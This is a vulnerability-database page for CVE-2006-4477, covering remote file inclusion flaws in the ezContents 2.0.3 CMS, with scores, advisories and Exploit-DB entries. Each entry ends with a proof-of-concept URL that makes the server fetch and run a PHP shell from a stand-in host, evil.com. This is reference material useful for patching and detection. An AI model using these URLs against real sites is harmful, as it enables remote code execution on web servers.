CVE-2006-4477
published 2006-08-31CVE-2006-4477: Multiple PHP remote file inclusion vulnerabilities in Visual Shapers ezContents 2.0.3 allow remote attackers to execute arbitrary PHP code via an empty…
PriorityP343high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
4.88%
91.0th percentile
Multiple PHP remote file inclusion vulnerabilities in Visual Shapers ezContents 2.0.3 allow remote attackers to execute arbitrary PHP code via an empty GLOBALS[rootdp] parameter and an ftps URL in the (1) GLOBALS[admin_home] parameter in (a) diary/event_list.php, (b) gallery/gallery_summary.php, (c) guestbook/showguestbook.php, (d) links/showlinks.php, and (e) reviews/review_summary.php; and the (2) GLOBALS[language_home] parameter in (f) calendar/calendar.php, (g) news/shownews.php, (h) poll/showpoll.php, (i) search/search.php, (j) toprated/toprated.php, and (k) whatsnew/whatsnew.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| visualshapers | ezcontents | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-9vjx-8hr9-q3m8: PHP remote file inclusion vulnerability in modules/calendar/minicalendar
ghsa_unreviewed·2022-05-02·CVSS 7.5
CVE-2008-3575 [HIGH] CWE-94 GHSA-9vjx-8hr9-q3m8: PHP remote file inclusion vulnerability in modules/calendar/minicalendar
PHP remote file inclusion vulnerability in modules/calendar/minicalendar.php in ezContents CMS allows remote attackers to execute arbitrary PHP code via a URL in the GLOBALS[gsLanguage] parameter, a different vector than CVE-2006-4477 and CVE-2004-0132.
GHSA
GHSA-v3rh-37xp-88f8: Multiple PHP remote file inclusion vulnerabilities in Visual Shapers ezContents 2
ghsa_unreviewed·2022-05-01
CVE-2006-4477 [HIGH] GHSA-v3rh-37xp-88f8: Multiple PHP remote file inclusion vulnerabilities in Visual Shapers ezContents 2
Multiple PHP remote file inclusion vulnerabilities in Visual Shapers ezContents 2.0.3 allow remote attackers to execute arbitrary PHP code via an empty GLOBALS[rootdp] parameter and an ftps URL in the (1) GLOBALS[admin_home] parameter in (a) diary/event_list.php, (b) gallery/gallery_summary.php, (c) guestbook/showguestbook.php, (d) links/showlinks.php, and (e) reviews/review_summary.php; and the (2) GLOBALS[language_home] parameter in (f) calendar/calendar.php, (g) news/shownews.php, (h) poll/showpoll.php, (i) search/search.php, (j) toprated/toprated.php, and (k) whatsnew/whatsnew.php.
No detection rules found.
Exploit-DB
EZContents 2.0.3 - 'search.php?GLOBALS[language_home]' Remote File Inclusion
exploitdb·2006-08-30
CVE-2006-4477 EZContents 2.0.3 - 'search.php?GLOBALS[language_home]' Remote File Inclusion
EZContents 2.0.3 - 'search.php?GLOBALS[language_home]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/19776/info
ezContents is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may help the attacker compromise the application and the underlying system; other attacks are also possible.
http://www.example.com/modules/search/search.php?GLOBALS[rootdp]=&GLOBALS[language_home]=ftps://evil.com/sh.php&cmd=ls
Exploit-DB
EZContents 2.0 - 'gallery_summary.php?GLOBALS[admin_home]' Remote File Inclusion
exploitdb·2006-08-30
CVE-2006-4477 EZContents 2.0 - 'gallery_summary.php?GLOBALS[admin_home]' Remote File Inclusion
EZContents 2.0 - 'gallery_summary.php?GLOBALS[admin_home]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/19776/info
ezContents is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may help the attacker compromise the application and the underlying system; other attacks are also possible.
http://www.example.com/modules/gallery/gallery_summary.php?GLOBALS[rootdp]=&GLOBALS[admin_home]=ftps://evil.com/sh.php&cmd=ls
Exploit-DB
EZContents 2.0.3 - 'showlinks.php?GLOBALS[admin_home]' Remote File Inclusion
exploitdb·2006-08-30
CVE-2006-4477 EZContents 2.0.3 - 'showlinks.php?GLOBALS[admin_home]' Remote File Inclusion
EZContents 2.0.3 - 'showlinks.php?GLOBALS[admin_home]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/19776/info
ezContents is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may help the attacker compromise the application and the underlying system; other attacks are also possible.
http://www.example.com/modules/links/showlinks.php?GLOBALS[rootdp]=&GLOBALS[admin_home]=ftps://evil.com/sh.php&cmd=ls
Exploit-DB
EZContents 2.0.3 - 'review_summary.php?GLOBALS[admin_home]' Remote File Inclusion
exploitdb·2006-08-30
CVE-2006-4477 EZContents 2.0.3 - 'review_summary.php?GLOBALS[admin_home]' Remote File Inclusion
EZContents 2.0.3 - 'review_summary.php?GLOBALS[admin_home]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/19776/info
ezContents is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may help the attacker compromise the application and the underlying system; other attacks are also possible.
http://www.example.com/modules/reviews/review_summary.php?GLOBALS[rootdp]=&GLOBALS[admin_home]=ftps://evil.com/sh.php&cmd=ls
Exploit-DB
EZContents 2.0.3 - 'toprated.php?GLOBALS[language_home]' Remote File Inclusion
exploitdb·2006-08-30
CVE-2006-4477 EZContents 2.0.3 - 'toprated.php?GLOBALS[language_home]' Remote File Inclusion
EZContents 2.0.3 - 'toprated.php?GLOBALS[language_home]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/19776/info
ezContents is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may help the attacker compromise the application and the underlying system; other attacks are also possible.
http://www.example.com/modules/toprated/toprated.php?GLOBALS[rootdp]=&GLOBALS[language_home]=ftps://evil.com/sh.php&cmd=ls
Exploit-DB
EZContents 2.0.3 - 'calendar.php?GLOBALS[language_home]' Remote File Inclusion
exploitdb·2006-08-30
CVE-2006-4477 EZContents 2.0.3 - 'calendar.php?GLOBALS[language_home]' Remote File Inclusion
EZContents 2.0.3 - 'calendar.php?GLOBALS[language_home]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/19776/info
ezContents is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may help the attacker compromise the application and the underlying system; other attacks are also possible.
http://www.example.com/modules/calendar/calendar.php?GLOBALS[rootdp]=&GLOBALS[language_home]=ftps://evil.com/sh.php&cmd=ls
Exploit-DB
EZContents 2.0.3 - 'event_list.php?GLOBALS[admin_home]' Remote File Inclusion
exploitdb·2006-08-30
CVE-2006-4477 EZContents 2.0.3 - 'event_list.php?GLOBALS[admin_home]' Remote File Inclusion
EZContents 2.0.3 - 'event_list.php?GLOBALS[admin_home]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/19776/info
ezContents is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may help the attacker compromise the application and the underlying system; other attacks are also possible.
http://www.example.com/modules/diary/event_list.php?GLOBALS[rootdp]=&GLOBALS[admin_home]=ftps://evil.com/sh.php&cmd=ls
Exploit-DB
EZContents 2.0.3 - 'showguestbook.php?GLOBALS[admin_home]' Remote File Inclusion
exploitdb·2006-08-30
CVE-2006-4477 EZContents 2.0.3 - 'showguestbook.php?GLOBALS[admin_home]' Remote File Inclusion
EZContents 2.0.3 - 'showguestbook.php?GLOBALS[admin_home]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/19776/info
ezContents is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may help the attacker compromise the application and the underlying system; other attacks are also possible.
http://www.example.com/modules/guestbook/showguestbook.php?GLOBALS[rootdp]=&GLOBALS[admin_home]=ftps://evil.com/sh.php&cmd=ls
Exploit-DB
EZContents 2.0.3 - 'showpoll.php?GLOBALS[admin_home]' Remote File Inclusion
exploitdb·2006-08-30
CVE-2006-4477 EZContents 2.0.3 - 'showpoll.php?GLOBALS[admin_home]' Remote File Inclusion
EZContents 2.0.3 - 'showpoll.php?GLOBALS[admin_home]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/19776/info
ezContents is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may help the attacker compromise the application and the underlying system; other attacks are also possible.
http://www.example.com/modules/poll/showpoll.php?GLOBALS[rootdp]=&GLOBALS[language_home]=ftps://evil.com/sh.php&cmd=ls
Exploit-DB
EZContents 2.0.3 - 'shownews.php?GLOBALS[admin_home]' Remote File Inclusion
exploitdb·2006-08-30
CVE-2006-4477 EZContents 2.0.3 - 'shownews.php?GLOBALS[admin_home]' Remote File Inclusion
EZContents 2.0.3 - 'shownews.php?GLOBALS[admin_home]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/19776/info
ezContents is prone to multiple remote file-include vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may help the attacker compromise the application and the underlying system; other attacks are also possible.
http://www.example.com/modules/news/shownews.php?GLOBALS[rootdp]=&GLOBALS[language_home]=ftps://evil.com/sh.php&cmd=ls
No writeups or analysis indexed.
http://secunia.com/advisories/21703http://securityreason.com/securityalert/1479http://securitytracker.com/id?1016770http://www.osvdb.org/28321http://www.osvdb.org/28322http://www.osvdb.org/28323http://www.osvdb.org/28324http://www.osvdb.org/28325http://www.osvdb.org/28326http://www.osvdb.org/28327http://www.osvdb.org/28328http://www.osvdb.org/28329http://www.osvdb.org/28330http://www.osvdb.org/28331http://www.securityfocus.com/archive/1/444779/100/0/threadedhttp://www.securityfocus.com/bid/19776http://www.vupen.com/english/advisories/2006/3420https://exchange.xforce.ibmcloud.com/vulnerabilities/28674http://secunia.com/advisories/21703http://securityreason.com/securityalert/1479http://securitytracker.com/id?1016770http://www.osvdb.org/28321http://www.osvdb.org/28322http://www.osvdb.org/28323http://www.osvdb.org/28324http://www.osvdb.org/28325http://www.osvdb.org/28326http://www.osvdb.org/28327http://www.osvdb.org/28328http://www.osvdb.org/28329http://www.osvdb.org/28330http://www.osvdb.org/28331http://www.securityfocus.com/archive/1/444779/100/0/threadedhttp://www.securityfocus.com/bid/19776http://www.vupen.com/english/advisories/2006/3420https://exchange.xforce.ibmcloud.com/vulnerabilities/28674
2006-08-31
Published